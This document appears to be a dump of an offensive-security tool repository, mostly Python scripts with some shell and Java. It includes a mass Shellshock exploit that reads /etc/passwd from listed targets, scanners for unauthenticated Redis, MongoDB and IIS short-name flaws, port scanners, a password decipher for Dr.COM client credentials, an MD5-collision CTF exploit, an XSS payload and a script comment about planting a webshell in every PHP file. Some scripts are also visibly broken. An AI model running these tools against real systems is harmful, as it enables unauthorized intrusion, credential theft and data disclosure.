-------------------------------------------------------------------------------- /sh/echo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while true;do 3 | ls -al; 4 | sleep 5s; 5 | done 6 | -------------------------------------------------------------------------------- /sh/ftpd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ftp -n <<- EOF 3 | open 211.71.232.55 4 | user anonymous 123 5 | cd log 6 | bin 7 | get s.txt 8 | bye 9 | EOF -------------------------------------------------------------------------------- /sh/install_waf.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | tar -zcvf wwwback.tar.gz ./ 3 | 4 | mv waf.php waf.phpbk 5 | 6 | #在每个.php文件第一行写入包含waf 7 | phpfile=$(find -name '*.php') 8 | for pf in $phpfile 9 | do 10 | sed -i '1 i\' $pf #应该写waf的绝对路径 11 | done 12 | #在每一个php文件最后插马 13 | #sed -i '$ a\' xxx.php 14 | #还原waf,以其他php正确包含waf 15 | mv waf.phpbk waf.php 16 | 17 | -------------------------------------------------------------------------------- /tools/Rescan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #author=Cond0r@CodeScan 3 | import socket 4 | import threading 5 | from concurrent import futures 6 | from Queue import Queue 7 | from sys import argv 8 | import ipaddr 9 | import sys 10 | socket.setdefaulttimeout(3) 11 | data=''' 12 | Lib: 13 | https://github.com/google/ipaddr-py 14 | https://pypi.python.org/pypi/futures 15 | pip install futures 16 | Usage: 17 | python rescan.py -f inputfile.txt 18 | inputfile.txt: 19 | 10.14.40.194:6379 20 | python rescan.py -i 192.168.1.1/24 -p 6379 21 | ''' 22 | target_list=[] 23 | def stdout( name): 24 | scanow ='[*] Scan %s.. '%(name) 25 | sys.stdout.write(str(scanow)+" "*20+"\b\b\r") 26 | sys.stdout.flush() 27 | def extract_target(inputfile): 28 | global target_list 29 | inputdata=open(inputfile).read().replace("\r",'').split("\n") 30 | for host in inputdata: 31 | host=host.split(":") 32 | if len(host)==2: 33 | target_list.append("%s:%s"%(host[0],host[1])) 34 | elif len(host)==1: 35 | target_list.append("%s:6379"%(host[0])) 36 | return target_list 37 | def send_dbsize(conn): 38 | try: 39 | conn.send("dbsize\n") 40 | recv=conn.recv(5) 41 | conn.close() 42 | recv=recv.replace("\n",''), 43 | return recv 44 | except: 45 | return False 46 | 47 | def conn_redis(args): 48 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | args=args.split(":") 50 | host=args[0] 51 | port=int(args[1]) 52 | try: 53 | client.connect((host, port)) 54 | return client 55 | except: 56 | return False 57 | def run_task(target): 58 | stdout(target) 59 | conn=conn_redis(target) 60 | if conn: 61 | size=send_dbsize(conn) 62 | size=str(size) 63 | if 'NOAUTH' not in size and ':' in size: 64 | return "[!] Find %s Unauthorized "% target 65 | def main(): 66 | targetlist=[] 67 | if len(argv)>2: 68 | if argv[1]=='-f': 69 | return extract_target(argv[2]) 70 | if argv[1]=='-i': 71 | port=6379 72 | if len(argv)==5: 73 | port=int(argv[4]) 74 | targets = ipaddr.IPv4Network(argv[2]) 75 | for tar in targets: 76 | targetlist.append("%s:%d"%(tar,port)) 77 | return targetlist 78 | 79 | 80 | 81 | if len(argv)<3: 82 | print data 83 | exit() 84 | 85 | target_list=main() 86 | 87 | thread_pool = futures.ThreadPoolExecutor(max_workers=10) 88 | for i in thread_pool.map(run_task, target_list): 89 | if i!=None: 90 | print i 91 | -------------------------------------------------------------------------------- /tools/bash.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib2,re 3 | import urllib 4 | 5 | def bash_exp(url): 6 | regex = re.compile(r'/root:/bin/bash') 7 | header = { 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 10 | 'Accept-Encoding': 'gzip,deflate,sdch', 11 | 'Accept-Language': 'en-US,en;q=0.8', 12 | 'Connection': 'keep-alive', 13 | 'User-Agent': '() { :;}; echo `/bin/cat /etc/passwd`', 14 | 'Referer': 'http://www.google.com.hk' 15 | } 16 | request = urllib2.Request(url,headers = header) 17 | try: 18 | res = urllib2.urlopen(request) 19 | if re.findall(regex,res.read()): 20 | print u"bash: %s"%(url) 21 | else: 22 | print u"无bash漏洞: %s"%(url) 23 | res.close() 24 | except Exception: 25 | print u"访问网页超时%s"%(url) 26 | 27 | if __name__=='__main__': 28 | f = open('target.txt','r') 29 | for i in f.readlines(): 30 | bash_exp(urllib.unquote(i)) 31 | f.close() 32 | -------------------------------------------------------------------------------- /tools/drcom/Decipher.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/drcom/Decipher.class -------------------------------------------------------------------------------- /tools/drcom/Decipher.java: -------------------------------------------------------------------------------- 1 | // 145014129 Nk(Ga!a 2 | // xxy145014129 Mk*Gd#a 3 | 4 | // javac filename 5 | // java classname 6 | public class Decipher { 7 | 8 | private static final int MIN_ASC = 32; 9 | private static final int MAX_ASC = 126; 10 | private static final int NUM_ASC = 95; 11 | private static final long MYPRIMENUMBER = 100537L; 12 | private static final long MYPRIMENUMBER2 = 100609L; 13 | private static final String KEYWORD = "TblRefreshCurMonthServiceUse"; 14 | 15 | 16 | public static void main(String[] args) 17 | { 18 | System.out.println("============"); 19 | // String from_text = "Nk(Ga!a"; 20 | System.out.println(args[0]); 21 | String from_text = args[0]; 22 | String a = Decipher(from_text); 23 | System.out.println(a); 24 | System.out.println("============"); 25 | } 26 | 27 | public static String Decipher(String from_text) 28 | { 29 | char[] word = from_text.toCharArray(); 30 | StringBuilder to_text = new StringBuilder(); 31 | // long key = NumericPassword("TblRefreshCurMonthServiceUse"); 32 | long key = 30137; 33 | int str_len = from_text.length() - 1; 34 | for (int i = 0; i < str_len; i++) { 35 | word[i] = from_text.charAt(i); 36 | int ch = word[i]; 37 | if ((ch >= 32) && (ch <= 126)) { 38 | i++; 39 | ch -= 32; 40 | double offset = 96.0D * ( key * i % 100537L / 100537.0D); 41 | ch = (ch - (int)offset) % 95; 42 | if (ch < 0) 43 | ch += 95; 44 | ch += 32; 45 | i--; 46 | to_text.append((char)ch); 47 | } 48 | } 49 | return to_text.toString(); 50 | } 51 | /* 52 | private static long NumericPassword(String password) 53 | { 54 | long shift1 = 0L; 55 | long shift2 = 0L; 56 | long value = 0L; 57 | int str_len = password.length(); 58 | for (int i = 0; i < str_len; i++) { 59 | long ch = password.charAt(i); 60 | value ^= ch * MyIndex(shift1); 61 | value ^= ch * MyIndex(shift2); 62 | shift1 = (shift1 + 7L) % 19L; 63 | shift2 = (shift2 + 13L) % 23L; 64 | } 65 | value = (value ^ 0x18901) % 100537L; 66 | return value; 67 | } 68 | 69 | private static long MyIndex(long shadow) 70 | { 71 | long j = 1L; 72 | for (long i = 1L; i <= shadow; i += 1L) 73 | j *= 2L; 74 | return j; 75 | } 76 | */ 77 | } -------------------------------------------------------------------------------- /tools/drcom/Decipher.py: -------------------------------------------------------------------------------- 1 | def Decipher(s): 2 | p = '' 3 | key = 30137 4 | for i in xrange(len(s) - 1): 5 | ch = ord(s[i]) 6 | if ch >= 32 and ch <= 126: 7 | ch -= 32 8 | offset = int(96.0 * (key * (i + 1) % 100537 / 100537.0)) 9 | ch = (ch - offset) % 95 10 | if ch < 0: 11 | ch += 95 12 | ch += 32 13 | p += chr(ch) 14 | return p 15 | 16 | 17 | def save(fff, txt): 18 | f = open(fff, 'a') 19 | for i in txt: 20 | f.write(i) 21 | f.close() 22 | 23 | 24 | def fuck(): 25 | ll = [] 26 | f = open('x.txt') 27 | x = 1 28 | try: 29 | c = f.readlines() 30 | for i in c: 31 | i = i[1:-2].replace("\",\"", "####") 32 | t = i.split("####") 33 | ll.append(t[0] + "," + Decipher(t[1]) + "," + t[2] + ",\n") 34 | except: 35 | pass 36 | finally: 37 | save(ll) 38 | f.close() 39 | 40 | if __name__ == '__main__': 41 | # fuck('pwd.txt') 42 | print Decipher('''Sr'J`%a''') 43 | -------------------------------------------------------------------------------- /tools/elasticsearch.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/elasticsearch.py -------------------------------------------------------------------------------- /tools/ftp.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/ftp.py -------------------------------------------------------------------------------- /tools/google.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | __author__ = 'DM_' 3 | import simplejson,random 4 | import requests as req 5 | 6 | page = 1 7 | status = 200 8 | dock = str(raw_input('请输入google关键字:')) #这里是google关键词. 9 | while status == 200: 10 | headers = { 11 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 12 | 'Accept-Charset': 'gb18030,utf-8;q=0.7,*;q=0.3', 13 | 'Accept-Encoding': 'gzip,deflate,sdch', 14 | 'Accept-Language': 'en-US,en;q=0.8', 15 | 'Connection': 'keep-alive', 16 | 'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', 17 | 'Referer': 'http://www.baidu.com/' 18 | } 19 | 20 | url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s"%(dock,page) 21 | try: 22 | HtmlContent = req.get(url, timeout=30, headers=headers).text 23 | result = simplejson.loads(HtmlContent) 24 | status = result['responseStatus'] 25 | 26 | print "第%d页的数据:" % page 27 | try: 28 | Urls = result['responseData']['results'] 29 | for url in Urls: 30 | print url['url'] 31 | except: 32 | print '当前页面获取失败.' 33 | print result['responseDetails'] 34 | page += 1 35 | except: 36 | print "Time Out or site is not open." 37 | print "一共有%d页的数据" % (page-2) 38 | -------------------------------------------------------------------------------- /tools/iis_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | # encoding=gbk 2 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 3 | 4 | import sys 5 | import httplib 6 | import urlparse 7 | import string 8 | import threading 9 | import Queue 10 | import time 11 | import string 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = target 17 | self.scheme, self.netloc, self.path, params, query, fragment = \ 18 | urlparse.urlparse(target) 19 | if self.path[-1:] != '/': # ends with slash 20 | self.path += '/' 21 | self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-') 22 | self.files = [] 23 | self.dirs = [] 24 | self.queue = Queue.Queue() 25 | self.lock = threading.Lock() 26 | self.threads = [] 27 | 28 | 29 | def _conn(self): 30 | try: 31 | if self.scheme == 'https': 32 | conn = httplib.HTTPSConnection(self.netloc) 33 | else: 34 | conn = httplib.HTTPConnection(self.netloc) 35 | return conn 36 | except Exception, e: 37 | print '[Exception in function _conn]', e 38 | return None 39 | 40 | # fetch http response status code 41 | def _get_status(self, path): 42 | try: 43 | conn = self._conn() 44 | conn.request('GET', path) 45 | status = conn.getresponse().status 46 | conn.close() 47 | return status 48 | except Exception, e: 49 | raise Exception('[Exception in function _get_status] %s' % str(e) ) 50 | 51 | # test weather the server is vulerable 52 | def is_vul(self): 53 | try: 54 | status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder 55 | status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder 56 | if status_1 == 404 and status_2 == 400: 57 | return True 58 | return False 59 | except Exception, e: 60 | raise Exception('[Exception in function is_val] %s' % str(e) ) 61 | 62 | def run(self): 63 | # start from root path 64 | for payload in self.payloads: 65 | self.queue.put( (self.path + payload, '****') ) # filename, extention 66 | for i in range(10): 67 | t = threading.Thread(target=self._scan_worker) 68 | self.threads.append(t) 69 | t.start() 70 | 71 | def report(self): 72 | for t in self.threads: 73 | t.join() 74 | self._print('-'* 64) 75 | for d in self.dirs: 76 | self._print('Dir: ' + d) 77 | for f in self.files: 78 | self._print('File: ' + f) 79 | self._print('-'*64) 80 | self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) ) 81 | 82 | 83 | def _print(self, msg): 84 | self.lock.acquire() 85 | print msg 86 | self.lock.release() 87 | 88 | def _scan_worker(self): 89 | while True: 90 | try: 91 | url, ext = self.queue.get(timeout=3) 92 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 93 | if status == 404: 94 | self._print('Found ' + url + ext + '\t[scan in progress]') 95 | 96 | if len(url) - len(self.path)< 6: # enum first 6 chars only 97 | for payload in self.payloads: 98 | self.queue.put( (url + payload, ext) ) 99 | else: 100 | if ext == '****': # begin to scan extention 101 | for payload in string.ascii_lowercase: 102 | self.queue.put( (url, '*' + payload + '**') ) 103 | self.queue.put( (url,'') ) # also it can be a folder 104 | elif ext.count('*') == 3: 105 | for payload in string.ascii_lowercase: 106 | self.queue.put( (url, '*' + ext[1] + payload + '*') ) 107 | elif ext.count('*') == 2: 108 | for payload in string.ascii_lowercase: 109 | self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) ) 110 | elif ext == '': 111 | self.dirs.append(url + '~1') 112 | self._print('Found Dir ' + url + '~1\t[Done]') 113 | 114 | elif ext.count('*') == 1: 115 | self.files.append(url + '~1.' + ext[1:]) 116 | self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]') 117 | except Exception,e: 118 | break 119 | 120 | 121 | 122 | if len(sys.argv) == 1: 123 | print 'Usage: %s target' % sys.argv[0] 124 | sys.exit() 125 | 126 | file = sys.argv[1] 127 | fobj = open(file,'r') 128 | fileHandle = open('vul.txt','a+') 129 | for target in fobj: 130 | print target.strip() 131 | s = Scanner(target.strip()) 132 | if not s.is_vul(): 133 | print 'NO vulerable' 134 | #sys.exit(0) 135 | else: 136 | fileHandle.write(target) 137 | print 'server is vulerable' 138 | #s.run() 139 | #s.report() 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /tools/ip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding=utf-8 3 | 4 | import optparse,re,sys,os 5 | 6 | def getip(_txt): 7 | result = [] 8 | f = open(_txt,"r") 9 | line = f.read() 10 | result = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) 11 | result = {}.fromkeys(result).keys() 12 | return result 13 | 14 | def ping(hosts): 15 | ipss = [] 16 | for i in hosts: 17 | ret = os.system("ping -c 1 -t 1 %s > nop" % i) 18 | #ret = os.system("ping -n 1 -w 1 %s > nop" % i) 19 | if not ret: 20 | ipss.append(i) 21 | return ipss 22 | 23 | 24 | if __name__ == '__main__': 25 | txt = [] 26 | parser = optparse.OptionParser('usage: %prog [options] target') 27 | parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. default = 20') 28 | parser.add_option('-f', '--file', dest='names_file',default='false', type='string',help='files default = false') 29 | (options, args) = parser.parse_args() 30 | 31 | if str(options.names_file) == "false": 32 | if len(args) < 1 : 33 | parser.print_help() 34 | sys.exit(0) 35 | txt = ping(getip(str(options.names_file))) 36 | print txt 37 | -------------------------------------------------------------------------------- /tools/jinzhi.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import binascii 5 | 6 | __info__ = { 7 | "desc": "A script for running firesun's verify code", 8 | "version": "1.0", 9 | "usage": "", 10 | "Error": "This script has some error" 11 | } 12 | 13 | 14 | def str_to_bin_num(s): 15 | xx = '' 16 | for i in s: 17 | x = bin(ord(i)).replace('0b', '') 18 | if len(x) < 8: 19 | x = '0' + x 20 | xx += x 21 | return xx 22 | 23 | 24 | def str_to_bin_num_2(s): 25 | xx = '' 26 | for i in s: 27 | xx += bin(ord(i)).replace('0b', '') 28 | xx += ',' 29 | return xx[:-1] 30 | 31 | 32 | def bin_num_to_str(b): 33 | x = '' 34 | i = 8 35 | while i <= len(b): 36 | o = int('0b' + b[i - 8:i], base=2) 37 | x += chr(o) 38 | i += 8 39 | return x 40 | 41 | 42 | def bin_num_to_hex(b): 43 | x = '' 44 | i = 8 45 | while i <= len(b): 46 | x += str(hex(int('0b' + b[i - 8:i], base=2))).replace('0x', '\\x') 47 | i += 8 48 | return x 49 | 50 | 51 | def bin_num_to_hex2(b): 52 | x = '' 53 | i = 8 54 | while i <= len(b): 55 | x += str(hex(int('0b' + b[i - 8:i], base=2))).replace('0x', '') 56 | i += 8 57 | return '0x' + x 58 | 59 | 60 | def fuck2(a, b): 61 | x = '' 62 | for i in xrange(len(a)): 63 | x += str(int(a[i]) ^ int(b[i])) 64 | return x 65 | 66 | if __name__ == '__main__': 67 | a = str_to_bin_num('javascript:alert(/xss/);') 68 | c = bin_num_to_hex(a) 69 | print c 70 | -------------------------------------------------------------------------------- /tools/md5_collision_bin/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | url = "http://ctf.xjnu.edu.cn:9900/web80/flag_Revenge_2333333.php" 3 | b1 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' + \ 4 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' + \ 5 | '\xaf\xbf\xa2\x00\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' + \ 6 | '\x93\xd8\x49\x67\x6d\xa0\xd1\x55\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 7 | b2 = '\x4d\xc9\x68\xff\x0e\xe3\x5c\x20\x95\x72\xd4\x77\x7b\x72\x15\x87' +\ 8 | '\xd3\x6f\xa7\xb2\x1b\xdc\x56\xb7\x4a\x3d\xc0\x78\x3e\x7b\x95\x18' +\ 9 | '\xaf\xbf\xa2\x02\xa8\x28\x4b\xf3\x6e\x8e\x4b\x55\xb3\x5f\x42\x75' +\ 10 | '\x93\xd8\x49\x67\x6d\xa0\xd1\xd5\x5d\x83\x60\xfb\x5f\x07\xfe\xa2' 11 | # data = {'param1': open("message1.bin", "rb").read(), 12 | # 'param2': open("message2.bin", "rb").read()} 13 | data = {'param1': b1, 14 | 'param2': b2} 15 | r = requests.post(url, data=data) 16 | print(r.text) 17 | -------------------------------------------------------------------------------- /tools/md5_collision_bin/message1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/md5_collision_bin/message1.bin -------------------------------------------------------------------------------- /tools/md5_collision_bin/message2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/md5_collision_bin/message2.bin -------------------------------------------------------------------------------- /tools/mongdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import pymongo 4 | import random 5 | 6 | fobj = open('27017.txt','r') 7 | fileHandle = open('vul.txt','a+') 8 | for target in fobj: 9 | ip_addr = target.strip() 10 | try: 11 | print target.strip() 12 | conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000) 13 | print "ok" 14 | fileHandle.write(target) 15 | except Exception, e: 16 | print "can't conn" -------------------------------------------------------------------------------- /tools/php.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys,httplib 5 | from optparse import OptionParser 6 | usageString = "Usage: %prog [options] hostname" 7 | parser = OptionParser(usage=usageString) 8 | (opts,args) = parser.parse_args() 9 | if len(args) < 1: 10 | parser.error("Hostname is required") 11 | print __doc__ 12 | file = sys.argv[1] 13 | fobj = open(redis.txt,'r') 14 | fileHandle = open('php.txt','a+') 15 | for target in fobj: 16 | website = target.strip() 17 | #login path 18 | dirs = ["phpinfo.php","php.php","test.php","1.php"] 19 | for line in dirs: 20 | conn = httplib.HTTPConnection(website) 21 | conn.request('GET','/'+line) 22 | r1 = conn.getresponse() 23 | if r1.status == 200 or r1.status == 301 or r1.status == 403: 24 | print website+'/'+line,r1.status,r1.reason 25 | if not s.is_vul(): 26 | print 'NO vulerable' 27 | #sys.exit(0) 28 | else: 29 | fileHandle.write(target) 30 | print 'server is vulerable' 31 | -------------------------------------------------------------------------------- /tools/php_mt_seed-3.2.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/tools/php_mt_seed-3.2.tar.gz -------------------------------------------------------------------------------- /tools/png_create.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tools/portscan.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | from socket import * 5 | 6 | __info__ = { 7 | "desc": "A script for scan port", 8 | "version": "1.0", 9 | "usage": "ip port[,more] [timeout]" 10 | } 11 | 12 | status = { 13 | 0: "open", 14 | 10049: "address not available", 15 | 10061: "closed", 16 | 10060: "timeout", 17 | 10056: "already connected", 18 | 10035: "filtered", 19 | 11001: "IP not found", 20 | 10013: "permission denied" 21 | } 22 | 23 | PORT_TABLE = { 24 | 21: "FTP", 25 | 22: "SSH", 26 | 23: "Telent", 27 | 80: "HTTP", 28 | 443: "HTTPS", 29 | 1521: "Oracle Server", 30 | 3306: "MySQL Server", 31 | 3389: "RDP" 32 | } 33 | 34 | 35 | def scan(ip, port, timeout): 36 | s = socket(AF_INET, SOCK_STREAM) 37 | s.settimeout(timeout) 38 | try: 39 | result = s.connect_ex((ip, port)) 40 | except: 41 | print "Cannot connect to IP" 42 | return 43 | s.close() 44 | if result in status.keys(): 45 | return str(port) + " : " + PORT_TABLE[port] + " : " + status[result] 46 | else: 47 | return str(port) + " : " + PORT_TABLE[port] + " : " + str(result) 48 | 49 | 50 | def run(arg): 51 | data = { 52 | "ip": "", 53 | "timeout": 5 54 | } 55 | if len(arg) < 2: 56 | return 'Error' 57 | data['ip'] = arg[0] 58 | ports = arg[1].split(",") 59 | if len(arg) > 3: 60 | data['timeout'] = int(arg[2]) 61 | if len(ports) == 1: 62 | data['port'] = int(arg[1]) 63 | return scan(**data) 64 | else: 65 | return [scan(port=int(i), **data) for i in ports] 66 | 67 | if __name__ == '__main__': 68 | for i in range(256): 69 | print("192.168.5.%d" % i) 70 | print run(["192.168.5.%d" % i, "80"]) 71 | -------------------------------------------------------------------------------- /tools/portscan2.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import optparse 5 | from socket import * 6 | from threading import * 7 | 8 | screenLock = Semaphore(value=1) 9 | 10 | 11 | def connScan(tgtHost, tgtPort): 12 | try: 13 | connSkt = socket(AF_INET, SOCK_STREAM) 14 | connSkt.connect((tgtHost, tgtPort)) 15 | connSkt.send('ViolentPython\r\n') 16 | results = connSkt.recv(100) 17 | screenLock.acquire() 18 | print '[+]%d/tcp open' % tgtPort 19 | print '[+] ' + str(results) 20 | except: 21 | screenLock.acquire() 22 | print '[-] %d/tcp closed' % tgtPort 23 | finally: 24 | screenLock.release() 25 | connSkt.close() 26 | 27 | 28 | def portScan(tgtHost, tgtPorts): 29 | try: 30 | tgtIP = gethostbyname(tgtHost) 31 | except: 32 | print "[-] Cannot resolve '%s': Unknown host" % tgtHost 33 | return 34 | try: 35 | tgtName = gethostbyaddr(tgtIP) 36 | print '\n[+] Scan Results for:' + tgtName[0] 37 | except: 38 | print '\n[+] Scan Results for:' + tgtIP 39 | setdefaulttimeout(1) 40 | for tgtPort in tgtPorts: 41 | t = Thread(target=connScan, args=( 42 | tgtHost, int(tgtPort))) # set a thread 43 | t.start() 44 | 45 | 46 | def main(): 47 | parser = optparse.OptionParser("usage%prog" + 48 | "-H -p ") 49 | ''' 50 | 调用optparse.OptionParser([usage message])方法生成一个 51 | 参数解析器类的实例。 52 | ''' 53 | parser.add_option('-H', dest='tgtHost', type='string', 54 | help='specify target host') 55 | parser.add_option('-p', dest='tgtPort', type='string', 56 | help='specify target port[s] separated by comma') 57 | (options, args) = parser.parse_args() 58 | tgtHost = options.tgtHost 59 | tgtPorts = str(options.tgtPort).split(',') 60 | if(tgtHost == None) | (tgtPorts[0] == None): 61 | print parser.usage 62 | exit(0) 63 | portScan(tgtHost, tgtPorts) 64 | 65 | if __name__ == '__main__': 66 | main() 67 | -------------------------------------------------------------------------------- /tools/portscan3.py: -------------------------------------------------------------------------------- 1 | #!/user/bin python 2 | # -*- coding:utf-8 -*- 3 | # Author:Bing 4 | # Contact:amazing_bing@outlook.com 5 | # DateTime: 2017-01-17 19:06:06 6 | # Description: coding 7 | 8 | import sys 9 | sys.path.append("..") 10 | 11 | import threading 12 | import socket 13 | import sys 14 | import cmd 15 | import os 16 | import Queue 17 | from core.settings import * 18 | 19 | # 线程锁 20 | lock = threading.Lock() 21 | 22 | # 制作扫描端口队列 23 | 24 | 25 | def GetQueue(host): 26 | PortQueue = Queue.Queue() 27 | for port in range(1, 65535): 28 | PortQueue.put((host, port)) 29 | return PortQueue 30 | 31 | 32 | class ScanThread(threading.Thread): 33 | 34 | def __init__(self, SingleQueue, outip): 35 | threading.Thread.__init__(self) 36 | self.setDaemon(True) # 设置后台运行,让join结束 37 | self.SingleQueue = SingleQueue 38 | self.outip = outip 39 | 40 | def get_port_service(self, text): 41 | service_path = dict_script_path + "nmap-services.txt" 42 | port_server = str(text) + "/tcp" 43 | with open(service_path, "r") as server: 44 | for finger in server.readlines(): 45 | port = finger.strip().split(";")[1] 46 | if port == port_server: 47 | fingers = str(finger.strip().split(";")[0]) 48 | return (port_server, fingers) 49 | return (port_server, "unknown") 50 | 51 | def Ping(self, scanIP, Port): 52 | global OpenPort, lock 53 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 54 | sock.settimeout(0.1) 55 | address = (scanIP, Port) 56 | try: 57 | sock.connect(address) 58 | except: 59 | sock.close() 60 | return False 61 | sock.close() 62 | if lock.acquire(): 63 | # print "IP:%s Port:%d" % (scanIP, Port) 64 | self.outip.put(self.get_port_service(Port)) 65 | lock.release() 66 | return True 67 | 68 | def run(self): 69 | while not self.SingleQueue.empty(): 70 | # 获取扫描队列,并扫描 71 | host, port = self.SingleQueue.get() 72 | self.Ping(host, port) 73 | 74 | 75 | class Work(object): 76 | 77 | def __init__(self, scan_id="", scan_target="", scan_type="", scan_args="", back_fn=None): 78 | self.scan_id = scan_id 79 | self.target = scan_target 80 | self.scan_type = scan_type 81 | self.args = scan_args 82 | self.back_fn = back_fn 83 | self.result = [] 84 | 85 | def run(self): 86 | ThreadList = [] 87 | # 扫描队列 88 | SingleQueue = GetQueue(self.target) 89 | # 存储结果队列 90 | resultQueue = Queue.Queue() 91 | # 启动200线程并发 92 | for i in range(0, 200): 93 | t = ScanThread(SingleQueue, resultQueue) 94 | ThreadList.append(t) 95 | for t in ThreadList: 96 | t.start() 97 | for t in ThreadList: 98 | # 需要设置线程为后台,然后没法结束;join等待结束后台线程 99 | t.join(0.1) 100 | 101 | data = [] 102 | while not resultQueue.empty(): 103 | line = resultQueue.get() 104 | data.append( 105 | {"bug_name": str(line[0]), "bug_summary": str(line[1])}) 106 | result = {"status": 1, "data": data, 107 | "scan_id": self.scan_id, "scan_type": "nmap"} 108 | self.back_fn(result) 109 | 110 | 111 | def save(nmap_result): 112 | print nmap_result, "----------------" 113 | 114 | if __name__ == '__main__': 115 | t = Work(scan_target="100tal.org", back_fn=save) 116 | t.run() 117 | -------------------------------------------------------------------------------- /tools/portscan4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding=utf-8 3 | # Filename: test.py 4 | # author = 0c0c0f 5 | import threading,sys,socket,re 6 | import time,Queue 7 | import optparse 8 | 9 | #定义扫描端口 10 | PortList = [21,22,23,25,53,80,443,445,873,1433,1521,1723,3306,3389,4848,4899,5800,5900,7001,8080,8443,8500,9080,9200,27017] 11 | #存放IP数组 12 | result =[] 13 | #定义连接超时时间 14 | Timeout = 2 15 | # 创建锁 16 | mutex = threading.Lock() 17 | #定义线程池 18 | threads = [] 19 | #创建队列 20 | queue = Queue.Queue() 21 | 22 | def scan(): 23 | global mutex,queue,Timeout 24 | #time.sleep(2) 25 | #print threading.currentThread().getName() 26 | while True: 27 | try: 28 | item = queue.get(timeout=0.1) 29 | sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | sk.settimeout(Timeout) 31 | try: 32 | sk.connect((item['ip'],int(item['port']))) 33 | mutex.acquire() 34 | print('Server %s port %d OK!' % (item['ip'],item['port'])) 35 | mutex.release() 36 | sk.close() 37 | except: 38 | pass 39 | except: 40 | break 41 | ''' 42 | sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | sk.settimeout(Timeout) 44 | try: 45 | mutex.acquire() 46 | sk.connect((i,p)) 47 | print('Server %s port %d OK!' % (i,p)) 48 | mutex.release() 49 | except Exception: 50 | pass 51 | sk.close() 52 | ''' 53 | 54 | def main(txt,num): 55 | #把数组压入队列 56 | for j in PortList: 57 | queue.put({'ip': txt,'port':int(j)}) 58 | # 先创建线程对象 59 | for x in xrange(0, num): 60 | th = threading.Thread(target=scan) 61 | th.start() 62 | threads.append(th) 63 | for t in threads: 64 | t.join() 65 | 66 | if __name__ == '__main__': 67 | parser = optparse.OptionParser('usage: %prog [options] target') 68 | parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. default = 20') 69 | (options, args) = parser.parse_args() 70 | m = re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', args[0]) 71 | if len(args) < 1 and m: 72 | parser.print_help() 73 | sys.exit(0) 74 | 75 | txt = str(args[0]) 76 | time1= time.time() 77 | main(txt,int(options.threads_num)) 78 | 